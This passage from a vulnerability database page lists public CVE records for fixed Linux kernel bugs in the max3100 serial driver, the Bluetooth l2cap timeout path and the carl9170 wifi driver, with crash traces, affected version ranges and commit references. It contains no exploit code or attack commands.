"datePublished": "2024-03-18T10:14:45.503Z",
"dateReserved": "2024-03-06T09:52:12.089Z",
"dateUpdated": "2025-05-04T07:39:56.098Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38633 (GCVE-0-2024-38633)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: max3100: Update uart_driver_registered on driver removal
The removal of the last MAX3100 device triggers the removal of
the driver. However, code doesn't update the respective global
variable and after insmod — rmmod — insmod cycle the kernel
oopses:
max3100 spi-PRP0001:01: max3100_probe: adding port 0
BUG: kernel NULL pointer dereference, address: 0000000000000408
...
RIP: 0010:serial_core_register_port+0xa0/0x840
...
max3100_probe+0x1b6/0x280 [max3100]
spi_probe+0x8d/0xb0
Update the actual state so next time UART driver will be registered
again.
Hugo also noticed, that the error path in the probe also affected
by having the variable set, and not cleared. Instead of clearing it
move the assignment after the successfull uart_register_driver() call.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38633",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-24T15:15:33.848896Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-24T15:15:44.451Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:51.827Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21a61a7fbcfdd3493cede43ebc7c4dfae2147a8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9db4222ed8cd3e50b81c8b910ae74c26427a4003"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8e2a4339decad7e59425b594a98613402652d72"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/361a92c9038e8c8c3996f8eeaa14522a8ad90752"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6eb7aff23e05f362e8c9b560f6ac5e727b70e00"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8a10089eddba40d4b2080c9d3fc2d2b2488f762"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa84ca78b048dfb00df0ef446f5c35e0a98ca6a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/712a1fcb38dc7cac6da63ee79a88708fbf9c45ec"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/max3100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "21a61a7fbcfdd3493cede43ebc7c4dfae2147a8b",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "9db4222ed8cd3e50b81c8b910ae74c26427a4003",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "e8e2a4339decad7e59425b594a98613402652d72",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "361a92c9038e8c8c3996f8eeaa14522a8ad90752",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "b6eb7aff23e05f362e8c9b560f6ac5e727b70e00",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "e8a10089eddba40d4b2080c9d3fc2d2b2488f762",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "fa84ca78b048dfb00df0ef446f5c35e0a98ca6a0",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "712a1fcb38dc7cac6da63ee79a88708fbf9c45ec",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/max3100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.30"
},
{
"lessThan": "2.6.30",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: max3100: Update uart_driver_registered on driver removal\n\nThe removal of the last MAX3100 device triggers the removal of\nthe driver. However, code doesn\u0027t update the respective global\nvariable and after insmod \u2014 rmmod \u2014 insmod cycle the kernel\noopses:\n\n max3100 spi-PRP0001:01: max3100_probe: adding port 0\n BUG: kernel NULL pointer dereference, address: 0000000000000408\n ...\n RIP: 0010:serial_core_register_port+0xa0/0x840\n ...\n max3100_probe+0x1b6/0x280 [max3100]\n spi_probe+0x8d/0xb0\n\nUpdate the actual state so next time UART driver will be registered\nagain.\n\nHugo also noticed, that the error path in the probe also affected\nby having the variable set, and not cleared. Instead of clearing it\nmove the assignment after the successfull uart_register_driver() call."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:45.456Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/21a61a7fbcfdd3493cede43ebc7c4dfae2147a8b"
},
{
"url": "https://git.kernel.org/stable/c/9db4222ed8cd3e50b81c8b910ae74c26427a4003"
},
{
"url": "https://git.kernel.org/stable/c/e8e2a4339decad7e59425b594a98613402652d72"
},
{
"url": "https://git.kernel.org/stable/c/361a92c9038e8c8c3996f8eeaa14522a8ad90752"
},
{
"url": "https://git.kernel.org/stable/c/b6eb7aff23e05f362e8c9b560f6ac5e727b70e00"
},
{
"url": "https://git.kernel.org/stable/c/e8a10089eddba40d4b2080c9d3fc2d2b2488f762"
},
{
"url": "https://git.kernel.org/stable/c/fa84ca78b048dfb00df0ef446f5c35e0a98ca6a0"
},
{
"url": "https://git.kernel.org/stable/c/712a1fcb38dc7cac6da63ee79a88708fbf9c45ec"
}
],
"title": "serial: max3100: Update uart_driver_registered on driver removal",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38633",
"datePublished": "2024-06-21T10:18:22.905Z",
"dateReserved": "2024-06-18T19:36:34.947Z",
"dateUpdated": "2025-11-04T17:21:51.827Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-27399 (GCVE-0-2024-27399)
Vulnerability from cvelistv5
Published
2024-05-13 10:24
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: l2cap: fix null-ptr-deref in l2cap_chan_timeout
There is a race condition between l2cap_chan_timeout() and
l2cap_chan_del(). When we use l2cap_chan_del() to delete the
channel, the chan->conn will be set to null. But the conn could
be dereferenced again in the mutex_lock() of l2cap_chan_timeout().
As a result the null pointer dereference bug will happen. The
KASAN report triggered by POC is shown below:
[ 472.074580] ==================================================================
[ 472.075284] BUG: KASAN: null-ptr-deref in mutex_lock+0x68/0xc0
[ 472.075308] Write of size 8 at addr 0000000000000158 by task kworker/0:0/7
[ 472.075308]
[ 472.075308] CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.9.0-rc5-00356-g78c0094a146b #36
[ 472.075308] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu4
[ 472.075308] Workqueue: events l2cap_chan_timeout
[ 472.075308] Call Trace:
[ 472.075308] <TASK>
[ 472.075308] dump_stack_lvl+0x137/0x1a0
[ 472.075308] print_report+0x101/0x250
[ 472.075308] ? __virt_addr_valid+0x77/0x160
[ 472.075308] ? mutex_lock+0x68/0xc0
[ 472.075308] kasan_report+0x139/0x170
[ 472.075308] ? mutex_lock+0x68/0xc0
[ 472.075308] kasan_check_range+0x2c3/0x2e0
[ 472.075308] mutex_lock+0x68/0xc0
[ 472.075308] l2cap_chan_timeout+0x181/0x300
[ 472.075308] process_one_work+0x5d2/0xe00
[ 472.075308] worker_thread+0xe1d/0x1660
[ 472.075308] ? pr_cont_work+0x5e0/0x5e0
[ 472.075308] kthread+0x2b7/0x350
[ 472.075308] ? pr_cont_work+0x5e0/0x5e0
[ 472.075308] ? kthread_blkcg+0xd0/0xd0
[ 472.075308] ret_from_fork+0x4d/0x80
[ 472.075308] ? kthread_blkcg+0xd0/0xd0
[ 472.075308] ret_from_fork_asm+0x11/0x20
[ 472.075308] </TASK>
[ 472.075308] ==================================================================
[ 472.094860] Disabling lock debugging due to kernel taint
[ 472.096136] BUG: kernel NULL pointer dereference, address: 0000000000000158
[ 472.096136] #PF: supervisor write access in kernel mode
[ 472.096136] #PF: error_code(0x0002) - not-present page
[ 472.096136] PGD 0 P4D 0
[ 472.096136] Oops: 0002 [#1] PREEMPT SMP KASAN NOPTI
[ 472.096136] CPU: 0 PID: 7 Comm: kworker/0:0 Tainted: G B 6.9.0-rc5-00356-g78c0094a146b #36
[ 472.096136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu4
[ 472.096136] Workqueue: events l2cap_chan_timeout
[ 472.096136] RIP: 0010:mutex_lock+0x88/0xc0
[ 472.096136] Code: be 08 00 00 00 e8 f8 23 1f fd 4c 89 f7 be 08 00 00 00 e8 eb 23 1f fd 42 80 3c 23 00 74 08 48 88
[ 472.096136] RSP: 0018:ffff88800744fc78 EFLAGS: 00000246
[ 472.096136] RAX: 0000000000000000 RBX: 1ffff11000e89f8f RCX: ffffffff8457c865
[ 472.096136] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff88800744fc78
[ 472.096136] RBP: 0000000000000158 R08: ffff88800744fc7f R09: 1ffff11000e89f8f
[ 472.096136] R10: dffffc0000000000 R11: ffffed1000e89f90 R12: dffffc0000000000
[ 472.096136] R13: 0000000000000158 R14: ffff88800744fc78 R15: ffff888007405a00
[ 472.096136] FS: 0000000000000000(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
[ 472.096136] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 472.096136] CR2: 0000000000000158 CR3: 000000000da32000 CR4: 00000000000006f0
[ 472.096136] Call Trace:
[ 472.096136] <TASK>
[ 472.096136] ? __die_body+0x8d/0xe0
[ 472.096136] ? page_fault_oops+0x6b8/0x9a0
[ 472.096136] ? kernelmode_fixup_or_oops+0x20c/0x2a0
[ 472.096136] ? do_user_addr_fault+0x1027/0x1340
[ 472.096136] ? _printk+0x7a/0xa0
[ 472.096136] ? mutex_lock+0x68/0xc0
[ 472.096136] ? add_taint+0x42/0xd0
[ 472.096136] ? exc_page_fault+0x6a/0x1b0
[ 472.096136] ? asm_exc_page_fault+0x26/0x30
[ 472.096136] ? mutex_lock+0x75/0xc0
[ 472.096136] ? mutex_lock+0x88/0xc0
[ 472.096136] ? mutex_lock+0x75/0xc0
[ 472.096136] l2cap_chan_timeo
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3df91ea20e744344100b10ae69a17211fcf5b207 Version: 3df91ea20e744344100b10ae69a17211fcf5b207 Version: 3df91ea20e744344100b10ae69a17211fcf5b207 Version: 3df91ea20e744344100b10ae69a17211fcf5b207 Version: 3df91ea20e744344100b10ae69a17211fcf5b207 Version: 3df91ea20e744344100b10ae69a17211fcf5b207 Version: 3df91ea20e744344100b10ae69a17211fcf5b207 Version: 3df91ea20e744344100b10ae69a17211fcf5b207 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27399",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-13T20:21:44.727650Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:50.323Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-26T15:03:06.207Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e137e2ba96e51902dc2878131823a96bf8e638ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6466ee65e5b27161c846c73ef407f49dfa1bd1d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06acb75e7ed600d0bbf7bff5628aa8f24a97978c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e97e16433eb4533083b096a3824b93a5ca3aee79"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8960ff650aec70485b40771cd8e6e8c4cb467d33"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/955b5b6c54d95b5e7444dfc81c95c8e013f27ac0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb86f955488c39526534211f2610e48a5cf8ead4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/adf0398cee86643b8eacde95f17d073d022f782c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DW2MIOIMOFUSNLHLRYX23AFR36BMKD65/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240926-0001/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/l2cap_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e137e2ba96e51902dc2878131823a96bf8e638ae",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
},
{
"lessThan": "6466ee65e5b27161c846c73ef407f49dfa1bd1d9",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
},
{
"lessThan": "06acb75e7ed600d0bbf7bff5628aa8f24a97978c",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
},
{
"lessThan": "e97e16433eb4533083b096a3824b93a5ca3aee79",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
},
{
"lessThan": "8960ff650aec70485b40771cd8e6e8c4cb467d33",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
},
{
"lessThan": "955b5b6c54d95b5e7444dfc81c95c8e013f27ac0",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
},
{
"lessThan": "eb86f955488c39526534211f2610e48a5cf8ead4",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
},
{
"lessThan": "adf0398cee86643b8eacde95f17d073d022f782c",
"status": "affected",
"version": "3df91ea20e744344100b10ae69a17211fcf5b207",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/l2cap_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.4"
},
{
"lessThan": "3.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: l2cap: fix null-ptr-deref in l2cap_chan_timeout\n\nThere is a race condition between l2cap_chan_timeout() and\nl2cap_chan_del(). When we use l2cap_chan_del() to delete the\nchannel, the chan-\u003econn will be set to null. But the conn could\nbe dereferenced again in the mutex_lock() of l2cap_chan_timeout().\nAs a result the null pointer dereference bug will happen. The\nKASAN report triggered by POC is shown below:\n\n[ 472.074580] ==================================================================\n[ 472.075284] BUG: KASAN: null-ptr-deref in mutex_lock+0x68/0xc0\n[ 472.075308] Write of size 8 at addr 0000000000000158 by task kworker/0:0/7\n[ 472.075308]\n[ 472.075308] CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.9.0-rc5-00356-g78c0094a146b #36\n[ 472.075308] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu4\n[ 472.075308] Workqueue: events l2cap_chan_timeout\n[ 472.075308] Call Trace:\n[ 472.075308] \u003cTASK\u003e\n[ 472.075308] dump_stack_lvl+0x137/0x1a0\n[ 472.075308] print_report+0x101/0x250\n[ 472.075308] ? __virt_addr_valid+0x77/0x160\n[ 472.075308] ? mutex_lock+0x68/0xc0\n[ 472.075308] kasan_report+0x139/0x170\n[ 472.075308] ? mutex_lock+0x68/0xc0\n[ 472.075308] kasan_check_range+0x2c3/0x2e0\n[ 472.075308] mutex_lock+0x68/0xc0\n[ 472.075308] l2cap_chan_timeout+0x181/0x300\n[ 472.075308] process_one_work+0x5d2/0xe00\n[ 472.075308] worker_thread+0xe1d/0x1660\n[ 472.075308] ? pr_cont_work+0x5e0/0x5e0\n[ 472.075308] kthread+0x2b7/0x350\n[ 472.075308] ? pr_cont_work+0x5e0/0x5e0\n[ 472.075308] ? kthread_blkcg+0xd0/0xd0\n[ 472.075308] ret_from_fork+0x4d/0x80\n[ 472.075308] ? kthread_blkcg+0xd0/0xd0\n[ 472.075308] ret_from_fork_asm+0x11/0x20\n[ 472.075308] \u003c/TASK\u003e\n[ 472.075308] ==================================================================\n[ 472.094860] Disabling lock debugging due to kernel taint\n[ 472.096136] BUG: kernel NULL pointer dereference, address: 0000000000000158\n[ 472.096136] #PF: supervisor write access in kernel mode\n[ 472.096136] #PF: error_code(0x0002) - not-present page\n[ 472.096136] PGD 0 P4D 0\n[ 472.096136] Oops: 0002 [#1] PREEMPT SMP KASAN NOPTI\n[ 472.096136] CPU: 0 PID: 7 Comm: kworker/0:0 Tainted: G B 6.9.0-rc5-00356-g78c0094a146b #36\n[ 472.096136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu4\n[ 472.096136] Workqueue: events l2cap_chan_timeout\n[ 472.096136] RIP: 0010:mutex_lock+0x88/0xc0\n[ 472.096136] Code: be 08 00 00 00 e8 f8 23 1f fd 4c 89 f7 be 08 00 00 00 e8 eb 23 1f fd 42 80 3c 23 00 74 08 48 88\n[ 472.096136] RSP: 0018:ffff88800744fc78 EFLAGS: 00000246\n[ 472.096136] RAX: 0000000000000000 RBX: 1ffff11000e89f8f RCX: ffffffff8457c865\n[ 472.096136] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff88800744fc78\n[ 472.096136] RBP: 0000000000000158 R08: ffff88800744fc7f R09: 1ffff11000e89f8f\n[ 472.096136] R10: dffffc0000000000 R11: ffffed1000e89f90 R12: dffffc0000000000\n[ 472.096136] R13: 0000000000000158 R14: ffff88800744fc78 R15: ffff888007405a00\n[ 472.096136] FS: 0000000000000000(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000\n[ 472.096136] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 472.096136] CR2: 0000000000000158 CR3: 000000000da32000 CR4: 00000000000006f0\n[ 472.096136] Call Trace:\n[ 472.096136] \u003cTASK\u003e\n[ 472.096136] ? __die_body+0x8d/0xe0\n[ 472.096136] ? page_fault_oops+0x6b8/0x9a0\n[ 472.096136] ? kernelmode_fixup_or_oops+0x20c/0x2a0\n[ 472.096136] ? do_user_addr_fault+0x1027/0x1340\n[ 472.096136] ? _printk+0x7a/0xa0\n[ 472.096136] ? mutex_lock+0x68/0xc0\n[ 472.096136] ? add_taint+0x42/0xd0\n[ 472.096136] ? exc_page_fault+0x6a/0x1b0\n[ 472.096136] ? asm_exc_page_fault+0x26/0x30\n[ 472.096136] ? mutex_lock+0x75/0xc0\n[ 472.096136] ? mutex_lock+0x88/0xc0\n[ 472.096136] ? mutex_lock+0x75/0xc0\n[ 472.096136] l2cap_chan_timeo\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:11.047Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e137e2ba96e51902dc2878131823a96bf8e638ae"
},
{
"url": "https://git.kernel.org/stable/c/6466ee65e5b27161c846c73ef407f49dfa1bd1d9"
},
{
"url": "https://git.kernel.org/stable/c/06acb75e7ed600d0bbf7bff5628aa8f24a97978c"
},
{
"url": "https://git.kernel.org/stable/c/e97e16433eb4533083b096a3824b93a5ca3aee79"
},
{
"url": "https://git.kernel.org/stable/c/8960ff650aec70485b40771cd8e6e8c4cb467d33"
},
{
"url": "https://git.kernel.org/stable/c/955b5b6c54d95b5e7444dfc81c95c8e013f27ac0"
},
{
"url": "https://git.kernel.org/stable/c/eb86f955488c39526534211f2610e48a5cf8ead4"
},
{
"url": "https://git.kernel.org/stable/c/adf0398cee86643b8eacde95f17d073d022f782c"
}
],
"title": "Bluetooth: l2cap: fix null-ptr-deref in l2cap_chan_timeout",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27399",
"datePublished": "2024-05-13T10:24:57.045Z",
"dateReserved": "2024-02-25T13:47:42.681Z",
"dateUpdated": "2025-05-04T09:04:11.047Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38567 (GCVE-0-2024-38567)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: carl9170: add a proper sanity check for endpoints
Syzkaller reports [1] hitting a warning which is caused by presence
of a wrong endpoint type at the URB sumbitting stage. While there
was a check for a specific 4th endpoint, since it can switch types
between bulk and interrupt, other endpoints are trusted implicitly.
Similar warning is triggered in a couple of other syzbot issues [2].
Fix the issue by doing a comprehensive check of all endpoints
taking into account difference between high- and full-speed
configuration.
[1] Syzkaller report:
...
